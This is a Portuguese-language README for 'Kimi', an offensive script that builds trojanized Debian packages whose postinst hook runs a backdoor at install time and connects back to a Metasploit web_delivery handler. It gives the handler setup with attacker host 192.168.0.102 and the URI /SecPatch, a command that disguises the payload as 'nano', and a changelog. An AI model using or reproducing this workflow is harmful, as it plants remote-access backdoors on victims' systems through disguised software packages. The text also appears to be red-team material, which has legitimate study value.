
Script para gerar pacotes debian maliciosos (debain trojans).
Script para gerar pacotes Debian maliciosos (trojan debian).
Kimi é um nome inspirado em "Kimimaro", um dos meus personagens favoritos do anime chamado "Naruto".
Kimi é um script que gera pacotes Debian maliciosos para o Metasploit, que consiste em um arquivo bash. O arquivo bash é implantado no diretório "/usr/local/bin/".
O backdoor é executado exatamente quando a vítima tenta instalar o pacote deb devido ao arquivo postinst.
O arquivo bash injeta e também funciona como algum comando do sistema que, quando executado pela vítima e o atacante atinge com a sessão.
Pontos positivos :
-- Totalmente independente. Significa que o usuário não precisa instalar nenhum criador de pacotes Debian.
-- Pode ser integrado facilmente com qualquer gerador de payload devido ao uso de argumentos (bobo :P eu sei).
Kimi basicamente depende do módulo web_delivery e tudo é automatizado. Tudo o que o atacante precisa fazer é as seguintes configurações :
Configurando Web_Delivery no msf :
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit
Gerando payload malicioso :
dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386
NOTA :: Este projeto foi feito para ser integrado com o Venom Shellcode Generator 1.0.13.
Ele pode ser usado de forma independente também, tudo que o usuário precisa é alterar o uripath nas variáveis do msf.
-------------------------------------------------------------------------------------
Testado em :
Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
ParrotOS (Debian Jessie)
Kali Rolling 2.0
[Feb-22-2017]
-- Adicionada função de criação de arquivo "postinst" para automatizar a execução de arquivo malicioso incorporado.
-- Adicionada função de geração de arquivo RC para automatizar completamente com abertura de handler, ou seja, não é necessário configurar o handler manualmente.
-- Corrigidos alguns bugs comuns [agradecimento especial ao r00t 3xp10it :)]
[Oct-12-2017]
-- Adicionado argumento de linha de comando (-a/--arch) para selecionar arquitetura (i386/amd64)
[April-24-2019] - Test Release.
-- Agora URI e LPORT personalizados podem ser definidos.
-- O payload Python foi atualizado de acordo com Python 2/3 e também a versão mais recente do Metasploit 5.
-- Todo o código foi reimplementado, embora ainda suporte Python 2.7.

Post no blog : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
Vídeo no YouTube : https://youtu.be/Dsn6BRHy9_w
Amostra do Viruatotal (Porque vi uso desagradável deste script na natureza): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f
Suspicious Shell Activity [Red Team]
Twitter : @bofheaded